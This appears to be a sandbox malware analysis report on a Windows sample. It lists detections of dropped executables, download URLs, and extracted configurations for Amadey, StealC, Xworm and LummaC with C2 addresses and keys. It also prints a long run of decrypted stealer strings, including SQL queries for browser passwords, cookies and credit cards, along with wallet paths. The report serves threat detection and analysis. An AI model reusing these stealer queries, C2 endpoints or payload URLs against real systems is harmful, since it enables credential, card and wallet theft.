Source: https://atten-supporse.biz/api)	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\qk4EiZw[1].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[2].exe	Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen

Found malware configuration

Source: 00000015.00000002.1908666630.0000000000241000.00000040.00000001.01000000.0000000E.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 00000000.00000002.1867859972.00000000015FE000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
Source: 27.2.qk4EiZw.exe.1c0000.0.unpack	Malware Configuration Extractor: Xworm {"C2 url": ["112.213.116.149"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Source: 9faf801df7.exe.8024.28.memstrmin	Malware Configuration Extractor: LummaC {"C2 url": ["formy-spill.biz", "print-vexer.biz", "dare-curbys.biz", "dwell-exclaim.biz", "zinc-sneark.biz", "se-blurry.biz", "covery-mover.biz", "impend-differ.biz", "atten-supporse.biz"], "Build id": "LOGS11--LiveTraffic"}

Multi AV Scanner detection for domain / URL

Source: http://31.41.244.11/files/7299809293/qk4EiZw.exe

Virustotal: Detection: 17%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\qk4EiZw[1].exe	ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[2].exe	ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\random[1].exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\1012944001\e0da62c8af.exe	ReversingLabs: Detection: 23%

Multi AV Scanner detection for submitted file

Source: file.exe

Virustotal: Detection: 50%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\qk4EiZw[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: INSERT_KEY_HERE
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: 07
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: 01
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: 20
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: 25
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: GetProcAddress
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: LoadLibraryA
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: lstrcatA
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: OpenEventA
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: CreateEventA
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: CloseHandle
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: Sleep
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: GetUserDefaultLangID
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: VirtualAllocExNuma
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: VirtualFree
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: GetSystemInfo
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: VirtualAlloc
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: HeapAlloc
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: GetComputerNameA
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: lstrcpyA
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: GetProcessHeap
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: GetCurrentProcess
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: lstrlenA
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: ExitProcess
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: GlobalMemoryStatusEx
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: GetSystemTime
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: SystemTimeToFileTime
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: advapi32.dll
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: gdi32.dll
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: user32.dll
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: crypt32.dll
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: GetUserNameA
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: CreateDCA
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: GetDeviceCaps
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: ReleaseDC
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: CryptStringToBinaryA
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: sscanf
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: VMwareVMware
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: HAL9TH
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: JohnDoe
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: DISPLAY
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: %hu/%hu/%hu
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: http://185.215.113.206
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: /c4becf79229cb002.php
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: /68b591d6548ec281/
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: drum
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: GetEnvironmentVariableA
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: GetFileAttributesA
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: HeapFree
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: GetFileSize
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: GlobalSize
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: IsWow64Process
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: Process32Next
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: GetLocalTime
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: FreeLibrary
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: GetTimeZoneInformation
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: GetSystemPowerStatus
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: GetVolumeInformationA
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: GetWindowsDirectoryA
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: Process32First
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: GetLocaleInfoA
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: GetUserDefaultLocaleName
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: GetModuleFileNameA
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: DeleteFileA
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: FindNextFileA
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: LocalFree
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: FindClose
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: SetEnvironmentVariableA
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: LocalAlloc
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: GetFileSizeEx
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: ReadFile
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: SetFilePointer
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: WriteFile
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: CreateFileA
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: FindFirstFileA
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: CopyFileA
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: VirtualProtect
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: GetLastError
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: lstrcpynA
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: MultiByteToWideChar
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: GlobalFree
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: WideCharToMultiByte
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: GlobalAlloc
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: OpenProcess
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: TerminateProcess
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: GetCurrentProcessId
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: gdiplus.dll
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: ole32.dll
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: bcrypt.dll
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: wininet.dll
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: shlwapi.dll
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: shell32.dll
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: rstrtmgr.dll
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: CreateCompatibleBitmap
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: SelectObject
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: BitBlt
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: DeleteObject
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: CreateCompatibleDC
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: GdipGetImageEncodersSize
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: GdipGetImageEncoders
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: GdiplusStartup
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: GdiplusShutdown
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: GdipSaveImageToStream
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: GdipDisposeImage
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: GdipFree
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: GetHGlobalFromStream
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: CreateStreamOnHGlobal
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: CoUninitialize
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: CoInitialize
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: CoCreateInstance
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: BCryptDecrypt
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: BCryptSetProperty
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: BCryptDestroyKey
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: GetWindowRect
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: GetDesktopWindow
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: GetDC
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: CloseWindow
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: wsprintfA
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: EnumDisplayDevicesA
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: GetKeyboardLayoutList
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: CharToOemW
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: wsprintfW
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: RegQueryValueExA
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: RegEnumKeyExA
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: RegOpenKeyExA
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: RegCloseKey
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: RegEnumValueA
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: CryptBinaryToStringA
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: CryptUnprotectData
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: SHGetFolderPathA
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: ShellExecuteExA
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: InternetOpenUrlA
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: InternetConnectA
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: InternetCloseHandle
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: HttpSendRequestA
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: HttpOpenRequestA
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: InternetReadFile
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: InternetCrackUrlA
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: StrCmpCA
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: StrStrA
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: StrCmpCW
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: PathMatchSpecA
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: GetModuleFileNameExA
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: RmStartSession
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: RmRegisterResources
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: RmGetList
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: RmEndSession
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: sqlite3_open
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: sqlite3_prepare_v2
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: sqlite3_step
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: sqlite3_column_text
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: sqlite3_finalize
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: sqlite3_close
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: sqlite3_column_bytes
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: sqlite3_column_blob
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: encrypted_key
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: PATH
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: C:\ProgramData\nss3.dll
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: NSS_Init
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: NSS_Shutdown
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: PK11_GetInternalKeySlot
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: PK11_FreeSlot
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: PK11_Authenticate
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: PK11SDR_Decrypt
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: C:\ProgramData\
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: browser:
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: profile:
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: url:
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: login:
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: password:
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: Opera
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: OperaGX
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: Network
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: cookies
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: .txt
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: TRUE
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: FALSE
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: autofill
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: history
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: SELECT url FROM urls LIMIT 1000
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: cc
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: name:
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: month:
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: year:
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: card:
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: Cookies
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: Login Data
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: Web Data
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: History
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: logins.json
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: formSubmitURL
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: usernameField
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: encryptedUsername
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: encryptedPassword
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: guid
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: cookies.sqlite
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: formhistory.sqlite
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: places.sqlite
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: plugins
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: Local Extension Settings
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: Sync Extension Settings
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: IndexedDB
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: Opera Stable
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: Opera GX Stable
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: CURRENT
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: chrome-extension_
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: _0.indexeddb.leveldb
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: Local State
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: profiles.ini
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: chrome
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: opera
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: firefox
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: wallets
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: %08lX%04lX%lu
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: ProductName
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: x32
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: x64
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: %d/%d/%d %d:%d:%d
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: DisplayName
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: DisplayVersion
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: Network Info:
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: - IP: IP?
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: - Country: ISO?
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: System Summary:
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: - HWID:
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: - OS:
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: - Architecture:
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: - UserName:
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: - Computer Name:
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: - Local Time:
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: - UTC:
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: - Language:
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: - Keyboards:
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: - Laptop:
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: - Running Path:
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: - CPU:
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: - Threads:
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: - Cores:
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: - RAM:
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: - Display Resolution:
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: - GPU:
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: User Agents:
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: Installed Apps:
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: All Users:
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: Current User:
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: Process List:
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: system_info.txt
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: freebl3.dll
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: mozglue.dll
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: msvcp140.dll
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: nss3.dll
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: softokn3.dll
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: vcruntime140.dll
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: \Temp\
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: .exe
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: runas
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: open
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: /c start
Source: 29.2.0fb4fa91ba.exe.be0000.0.unpack	String decryptor: %DESKTOP%
